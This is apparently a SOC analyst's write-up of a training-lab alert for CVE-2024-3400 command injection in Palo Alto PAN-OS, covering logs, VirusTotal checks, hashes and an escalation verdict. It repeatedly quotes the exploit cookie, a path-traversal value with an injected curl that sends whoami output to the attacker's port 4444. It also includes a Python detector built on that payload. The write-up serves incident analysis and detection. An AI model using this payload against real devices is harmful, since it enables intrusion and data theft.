SOC274 — Palo Alto Networks PAN-OS Command Injection Vulnerability Exploitation (CVE-2024-3400)
by Tomasz Kozlowski
Ticket INFO:
A critical command injection vulnerability has been identified in Palo Alto Networks PAN-OS software
EventID :
249
Event Time :
Apr, 18, 2024, 03:09 AM
Rule :
SOC274 — Palo Alto Networks PAN-OS Command Injection Vulnerability Exploitation (CVE-2024-3400)
Level :
Security Analyst
Hostname :
PA-Firewall-01
Destination IP Address :
172.16.17.139
Source IP Address :
144.172.79.92
HTTP Request Method :
POST
Requested URL :
172.16.17.139/global-protect/login.esp
cookie :
SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaa`curl${IFS}144.172.79.92:4444?user=$(whoami)
Alert Trigger Reason :
Characteristic exploit pattern detected in the cookie and request, indicative of exploitation of CVE-2024-3400.
Device Action :
Allowed.
SOC Analyst Action:
Checking the Log Management tab for 144(.)172.79.92 and VirusTotal.
Logs:
RAW LOG
2024–04–18 15:09:42,628: dt_send INFO TX_DIR: send file dir: /opt/panlogs/tmp/device_telemetry/day/, n_files: 1
2024-04-18 15:09:42,628 : dt_send INFO sorted file list: tmp_dir: /opt/panlogs/tmp/device_telemetry/day/*
2024-04-18 15:09:42,629: dt_send INFO TX_DIR: send file dir: fname: /opt/panlogs/tmp/device_telemetry/day/aaa`curl${IFS}144.172.79.92:4444?user=$(whoami)
2024-04-18 15:09:42,629 : dt_send INFO TX FILE: send_fname: /opt/panlogs/tmp/device_telemetry/day/aaa`curl${IFS}144.172.79.92:4444?user=$(whoami)
2024-04-18 15:09:42,630: dt_send INFO TX_FILE: dest server ip: 144.172.79.92
2024-04-18 15:09:42,630 : dt_send INFO TX FILE: send_file_cmd: /usr/local/bin/dt_curl -i 172.16.17.139 -f /opt/panlogs/tmp/device_telemetry/day/aaa`curl${IFS}144.172.79.92:4444?user=$(whoami)
2024-04-18 15:09:43,152: dt_send INFO TX FILE: curl cmd status: 24, 24; err msg: 'DNS lookup failed'
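The two indicators above, the SESSID cookie from the alert and the dt_send telemetry log, can be checked mechanically. The following is an added Python example, not part of the original writeup or of PAN-OS; the regexes, the benign control values and the two-line sample log are my own constructions, the malicious values are the ones quoted on this page.

```python
import re
from typing import List, Optional

# Indicators behind this alert: a SESSID cookie that traverses into the device-telemetry
# directory, and a telemetry file name with shell metacharacters that dt_send hands to dt_curl.
TELEMETRY_DIR = "opt/panlogs/tmp/device_telemetry/"
TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")
SHELL_META = re.compile(r"`|\$\(|\$\{IFS\}|[;|&]")
SEND_CMD = re.compile(r"send_file_cmd: /usr/local/bin/dt_curl .*?-f (?P<fname>\S+)")

def parse_sessid(cookie_header: str) -> Optional[str]:
    """Return the SESSID value from a Cookie header, or None if there is none."""
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name == "SESSID":
            return value
    return None

def classify_cookie(cookie_header: str) -> str:
    """'exploit': traversal into the telemetry directory plus shell metacharacters (this
    page's case); 'suspicious': only one of the two; 'benign': neither."""
    sessid = parse_sessid(cookie_header)
    if sessid is None:
        return "benign"
    traversal = bool(TRAVERSAL.search(sessid)) or TELEMETRY_DIR in sessid
    meta = bool(SHELL_META.search(sessid))
    if traversal and meta:
        return "exploit"
    return "suspicious" if (traversal or meta) else "benign"

def flag_dt_send_lines(log_text: str) -> List[str]:
    """Return file names from dt_send 'send_file_cmd' lines whose basename contains shell
    metacharacters; a legitimate telemetry file never has such a name."""
    hits = []
    for line in log_text.splitlines():
        m = SEND_CMD.search(line)
        if m and SHELL_META.search(m.group("fname").rsplit("/", 1)[-1]):
            hits.append(m.group("fname"))
    return hits

# Constructed sample input: ALERT_COOKIE is the cookie from the alert above, BENIGN_COOKIE a
# made-up normal session id; SAMPLE_LOG pairs the page's send_file_cmd line with a made-up benign one.
ALERT_COOKIE = "SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaa`curl${IFS}144.172.79.92:4444?user=$(whoami)"
BENIGN_COOKIE = "SESSID=7f3a9c2e1b4d5f6a7b8c9d0e1f2a3b4c"
SAMPLE_LOG = (
    "2024-04-18 15:09:42,630 : dt_send INFO TX FILE: send_file_cmd: /usr/local/bin/dt_curl -i 172.16.17.139 -f /opt/panlogs/tmp/device_telemetry/day/aaa`curl${IFS}144.172.79.92:4444?user=$(whoami)\n"
    "2024-04-18 16:00:01,004 : dt_send INFO TX FILE: send_file_cmd: /usr/local/bin/dt_curl -i 172.16.17.139 -f /opt/panlogs/tmp/device_telemetry/hour/telemetry_16.tgz\n"
)
```

A cookie classified as "suspicious" on traversal alone still merits listing the telemetry directories for files that were not written by the telemetry job itself.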
VirusTotal: 12 security vendors flagged this IP as malicious.
hxxps://www.virustotal.com/gui/ip-address/144.172.79.92/community
Checks on Endpoint security:
Event Time :
Apr 18 2024 15:09:55
Process ID :
1233
Target Process Command Line :
/usr/libexec/mgmtsrvr/start
Image Path :
/usr/bin/python3
Image Hash :
3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927…
Process User :
letsdefend
Parent Name :
systemd
Parent Path :
/lib/systemd/systemd
Command Line :
/usr/bin/python3 update.py
Hash confirmed by Virus Total:
hxxps://www.virustotal.com/gui/file/3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac
Case :
Malicious.
The answer is Command injection.
Not planned
Internet - Company Network.
Yes.
Action: Escalation to TIER 2 and containment of the server until further investigation and remediation. Confirmed command injection attack.
Evidence:
IP 144.172.79[.]92
Cookie SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaa`curl${IFS}144.172.79[.]92:4444?user=$(whoami)
File update.py
Hash :
MD5
0c1554888ce9ed0da1583dbdf7b31651
SHA-1
988fc0d23e6e30c2c46ccec9bbff50b7453b8ba9
SHA-256
3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac
URL 172[.]16.17.139/global-protect/login.esp
Verdict: TRUE POSITIVE
Thanks All.
Tomasz Kozlowski
Cyber Security Analyst.